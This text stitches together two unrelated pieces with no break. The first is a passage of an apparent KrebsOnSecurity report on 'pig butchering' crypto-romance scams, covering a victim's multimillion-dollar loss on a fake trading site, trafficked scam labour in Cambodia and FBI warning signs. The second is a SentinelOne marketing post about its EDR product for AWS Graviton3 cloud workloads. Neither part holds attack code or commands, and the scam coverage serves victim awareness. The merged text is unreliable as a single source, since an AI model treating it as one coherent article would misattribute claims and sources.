“They’ll say ‘Hey, this is the food I’m eating tonight’ and the picture they share will show a pretty setting with a glass of wine, where they’re showcasing an enviable lifestyle but not really mentioning anything about how they achieved that,” West said. “And then later, maybe a few hours or days into the conversation, they’ll say, ‘You know I made some money recently investing in crypto,’ kind of sliding into the topic as if this wasn’t what they were doing the whole time.”

Curious investors are directed toward elaborate and official-looking online crypto platforms that appear to have thousands of active investors. Many of these platforms include extensive study materials and tutorials on cryptocurrency investing. New users are strongly encouraged to team up with more seasoned investors on the platform, and to make only small investments that they can afford to lose.

The now-defunct homepage of xtb-market[.]com, a scam cryptocurrency platform tied to a pig butchering scheme.

“They’re able to see some value increase, and maybe even be allowed to take out that value increase so that they feel comfortable about the situation,” West said. Some investors then need little encouragement to deposit additional funds, which usually generate increasingly higher “returns.”

West said many crypto trading platforms associated with pig butchering scams appear to have been designed much like a video game, where investor hype is built around upcoming “trading opportunities” that hint at even more fantastic earnings.

“There are bonus levels and VIP levels, and they’ll build hype and a sense of frenzy into the trading,” West said. “There are definitely some psychological mechanisms at work to encourage people to invest more.”

“What’s so devastating about many of the victims is they lose that sense of who they are,” she continued. “They thought they were a savvy, sophisticated person, someone who’s sort of immune to scams. I think the large scale of the trickery and psychological manipulation being used here can’t be understated. It’s like nothing I’ve seen before.”

A $5,000,000 LOSS

Courtney Nolan, a divorced mother of three daughters, says she lost more than $5 million to a pig butchering scam. Nolan lives in St. Louis and has a background in investment finance, but only started investing in cryptocurrencies in the past year.

Nolan’s case may be especially bad because she was already interested in crypto investing when the scammer reached out. At the time, Bitcoin was trading at or near all-time highs of nearly $68,000 per coin.

Nolan said her nightmare began in late 2021 with a Twitter direct message from someone who was following many of the same cryptocurrency influencers she followed. Her fellow crypto enthusiast then suggested they continue their discussion on WhatsApp. After much back and forth about his trading strategies, her new friend agreed to mentor her on how to make reliable profits using the crypto trading platform xtb.com.

“I had dabbled in leveraged trading before, but his mentor program gave me over 100 pages of study materials and agreed to walk me through their investment strategies over the course of a year,” Nolan told KrebsOnSecurity.

Nolan’s mentor had her create an account at the website xtb-market[.]com, which was made to be confusingly similar to XTB’s official platform. The site promoted several different investment packages, including a “starter plan” that involves a $5,250 up-front investment and promises more than 15 percent return across four separate trading bursts.

Platinum plans on xtb-market promised a whopping 45 percent ROI, with a minimum investment of $265,000. The site also offered a generous seven percent commission for referrals, which encouraged new investors to recruit others.

The now-defunct xtb-market[.]com.

While chatting via WhatsApp, Nolan and her mentor would trade side by side in xtb-market, initially with small investments ranging from $500 to $5,000. When those generated hefty returns, Nolan made bigger deposits. On several occasions she was able to withdraw amounts ranging from $10,000 to $30,000.

But after investing more than $4.5 million of her own money over nearly four months, Nolan found her account was suddenly frozen. She was then issued a tax statement saying she owed nearly $500,000 in taxes before she could reactivate her account or access her funds.

Nolan said it seems obvious in hindsight that she should never have paid the tax bill, because xtb-market and her mentor cut all communications with her after that, and the entire website disappeared just a few weeks later.

Justin Maile, an investigation partner manager at Chainalysis, told Vice News that the tax portion of the pig butchering scam relies on the “sunk costs fallacy,” when people are reluctant to abandon a failing strategy or course of action because they have already invested heavily in it.

“Once the victim starts getting skeptical or tries to withdraw their funds, they are often told that they have to pay tax on the gains before funds can be unlocked,” Maile told Vice News. “The scammers will try to get any last payments out of the victims by exploiting the sunk cost fallacy and dangling huge profits in front of them.”

Vice recently published an in-depth report on pig butchering’s link to organized crime gangs in Asia that lure young job seekers with the promise of customer service jobs in call centers. Instead, those who show up at the appointed place and time are taken on long car rides and/or forced hikes across the borders into Cambodia, where they are pressed into indentured servitude.

Vice found many of the people forced to work in pig-butchering scams are being held in Chinese-owned casinos operating in Cambodia. Many of those casinos were newly built when the Covid pandemic hit. As the new casinos and hotels sat empty, organized crime groups saw an opportunity to use these facilities to generate huge income streams, and many foreign travelers stranded in neighboring countries were eventually trafficked to these scam centers.

Vice reports:

“While figures on the number of people in scam centers in Cambodia is unknown, best estimates pieced together from various sources point to the tens of thousands across scam centers in Sihanoukville, Phnom Penh, and sites in border regions Poipet and Bavet. In April, Thailand’s assistant national police commissioner said 800 Thai citizens had been rescued from scam centers in Cambodia in recent months, with a further 1,000 citizens still trapped across the country. One Vietnamese worker estimated 300 of his compatriots were held on just one floor in a tall office block hosting scam operations.”

“…within Victory Paradise Resort alone there were 7,000 people, the majority from mainland China, but also Indonesians, Singaporeans and Filipinos. According to the Khmer Times, one 10-building complex of high-rises in Sihanoukville, known as The China Project, holds between 8,000 to 10,000 people participating in various scams—a workforce that would generate profits around the $1 billion mark each year at $300 per worker per day.”

THE KILLING FLOOR

REACT’s West said while there are a large number of pig butchering victims reporting their victimization to the FBI, very few are receiving anything more than instructions about filing a complaint with the FBI’s Internet Crime Complaint Center (IC3), which keeps track of cybercrime losses and victims.

“There’s a huge gap in victims that are seeing any kind of service at all, where they’re reporting to the FBI but not being able to talk to anyone,” she said. “They’re filling out the IC3 form and never hearing back. It sort of feels like the federal government is ignoring this, so people are going to local agencies, which are sending these victims our way.”

For many younger victims of pig butchering, even losses of a few thousand dollars can be financially devastating. KrebsOnSecurity recently heard from two different readers who said they were in their 20s and lost more than $40,000 each when the investment platforms they were trading on vanished with their money.

The FBI can often bundle numerous IC3 complaints involving the same assailants and victims into a single case for federal prosecutors to pursue the guilty, and/or try to recapture what was stolen. In general, however, victims of crypto crimes rarely see that money again, or if they do it can take many years.

“The next piece is what can we actually do with these cases,” West said. “We used to frame success as getting bad people behind bars, but these cases leave us as law enforcement with not a lot of opportunity there.”

West said the good news is U.S. authorities are seeing some success in freezing cryptocurrency wallets suspected of being tied to large-scale cybercriminal operations. Indeed, Nolan told KrebsOnSecurity that her losses were substantial enough to warrant an official investigation by the FBI, which she says has since taken steps to freeze at least some of the assets tied to xtb-market[.]com.

Likewise, West said she was recently able to freeze cryptocurrency funds stolen from some pig butchering victims, and now REACT is focusing on helping state and local authorities learn how to do the same.

“It’s important to be able to mobilize quickly and know how to freeze and seize crypto and get it back to its rightful owner,” West said. “We definitely have made seizures in cases involving pig butchering, but we haven’t gotten that back to the rightful owners yet.”

In April, the FBI warned Internet users to be on guard against pig butchering scams, which it said attract victims with “promises of romance and riches” before duping them out of their money. The IC3 said it received more than 4,300 complaints related to crypto-romance scams, resulting in losses of more than $429 million.

Here are some common elements of a pig butchering scam:

Dating apps: Pig-butchering attempts are common on dating apps, but they can begin with almost any type of communication, including SMS text messages.
WhatsApp: In virtually all documented cases of pig butchering, the target is moved fairly quickly into chatting with the scammer via WhatsApp.
No video: The scammers will come up with all kinds of excuses not to do a video call. But they will always refuse.
Investment chit-chat: Your contact (eventually) claims to have inside knowledge about the cryptocurrency market and can help you make money.

The FBI’s tips on avoiding crypto scams:

-Never send money, trade, or invest based on the advice of someone you have only met online.
-Don’t talk about your current financial status to unknown and untrusted people.
-Don’t provide your banking information, Social Security Number, copies of your identification or passport, or any other sensitive information to anyone online or to a site you do not know is legitimate.
-If an online investment or trading site is promoting unbelievable profits, it is most likely that—unbelievable.
-Be cautious of individuals who claim to have exclusive investment opportunities and urge you to act fast.

EDR for Cloud Workloads Running on AWS Graviton

SentinelOne is pleased to announce its EDR for cloud workloads has achieved the AWS Graviton Ready Designation for the AWS Graviton3 processor. AWS Graviton Ready solutions are vetted by AWS Partner Solution Architects to ensure customers have a consistent experience. As part of the AWS Graviton Ready Program, SentinelOne stands ready to help customers secure their Linux-based and containerized workloads, defending them from runtime threats such as cryptojacking malware and ransomware.

Graviton3 will be a boon for compute-intensive cloud workloads. Let’s start first with a brief intro to Graviton3, and then dive into the role of EDR in a multi-layered cloud security strategy.

A Brief Overview of Graviton3

The Graviton3 processor is AWS’ 7th generation processor and is the second generation to use the arm64 architecture. EC2 instances based on Graviton3 have several advantages which make them ideal for compute-intensive workloads, namely higher performance and lower power consumption.

Graviton3 delivers a 25% improvement in performance when compared to its 6th gen predecessor Graviton2, which itself realized a 40% improvement over the 5th generation x86 CPU. Graviton3 also delivers 2x memory bandwidth with its use of DDR5 memory.

Graviton3 also uses up to 60% less energy. For those organizations focused on reducing their carbon footprint while accelerating their digital transformation, Graviton3 is an attractive choice.

Cloud Rising, Cloud Defense-in-Depth

Cloud IaaS is projected to reach $120 billion in 2022, according to Gartner. That’s up about 30% year-on-year as organizations of all sizes continue to expand their cloud spend. To punctuate the point that “organizations of all sizes” applies, consider that over half of SMBs spend at least $1.2 million on cloud annually, whereas 37% of enterprises spend 10x that amount. And cloud security, for the 10th time in the last 11 years, remains the top concern of IT executives, at 85%.

Pause and consider that combination for a moment: everyone is concerned about cloud security and is accelerating their cloud spend despite those concerns. Innovation is king, and business operations depend upon the confidentiality, availability, and integrity of cloud workloads. This is where EDR for cloud workloads fits in, and it’s where a cloud defense-in-depth strategy begins to take shape.

Of course, image scanning is ubiquitous. Practically everyone is, and rightly should be, taking this necessary step, and there are any number of solutions out there. But image scanning alone is not enough. If it were, cloud security would not remain consistently atop the list of concerns of IT executives – remember, 10 of the last 11 years it was the topmost concern.

Defense-in-depth is required. In addition to image scanning, additional security layers of IAM (Identity and Access Management), cloud-native architecture, configuration management, and EDR each play important, complementary roles. It’s not any element in isolation, but the combination of all the layers that makes for robust security. And this robust cloud defense-in-depth strategy must not stand in the way of innovation.

EDR for Cloud Workloads

After you’ve scanned for software vulns, architected an elegant workload, applied IAM roles, and are managing the configuration of cloud resources like compute instances, cloud storage, virtual private clouds, and so on, you promote your workload to production. EDR is the last line of defense, hardening your cloud workloads against the threat of malware like cryptominers and ransomware, while enabling you to innovate quickly, and securely.

  • Crypto mining malware. Crypto mining is computationally intensive and costly, using an estimated 25% of a CPU’s processing capacity. Threat actors install malware on your cloud infrastructure to hijack/steal compute power – they keep the cryptocurrency, you keep the bill. This process is called cryptojacking. According to a report from Google’s Cybersecurity Action Team in Nov 2021, in a sample of compromised cloud compute instances, 86% had malware used to mine cryptocurrency. Similarly, Cisco reported that in 2020 an estimated 70% of its customers were victims of crypto mining malware.

    EDR solutions like that from SentinelOne can detect the crypto mining malware and stop it in its tracks. With SentinelOne, you can continue to innovate quickly with the confidence that our EDR is your backstop, using AI to detect and kill rogue processes like crypto miners and ransomware.

  • Vulnerability exploits. Consider also the Log4j vulnerability (CVE-2021-44228) announced in December 2021. Soon after its announcement, threat actors began scanning for publicly-exposed cloud servers which were vulnerable. Despite being disclosed so late in the year, Log4j was the second most exploited vulnerability in 2021. Here again, EDR can prove a robust defense.
  • Linux ransomware. Ransomware is not just for Windows workstations. There was a 146% increase in Linux ransomware code variants in 2021. Threat actors know that cloud is big business, and they are turning all the door knobs to see who left the front door to their cloud enterprise unlocked. EDR with behavioral AI can detect such machine-speed attacks in real-time, to stop the evil in its tracks.

Parting Thoughts

None of this is intended as doom, gloom, or FUD. We do, however, look at threats and threat actors with clear eyes. Like you, our cloud journey continues to accelerate. To minimize risk, we use a robust, multi-layered defense-in-depth strategy that includes our own high-performance, efficient, and scalable EDR solution. Our agent supports 13 major Linux distributions and is trusted by many of the world’s most well-known brands. We would welcome the opportunity to earn the right to protect your brand as well.

Are you headed to AWS re:Inforce 2022? Let’s meet! We would love to discuss your own cloud journey, and how SentinelOne can protect your cloud workloads, including those running on EC2 instances using AWS Graviton3.

Or, if you will not be there, please visit Singularity Cloud to learn more or request a demo.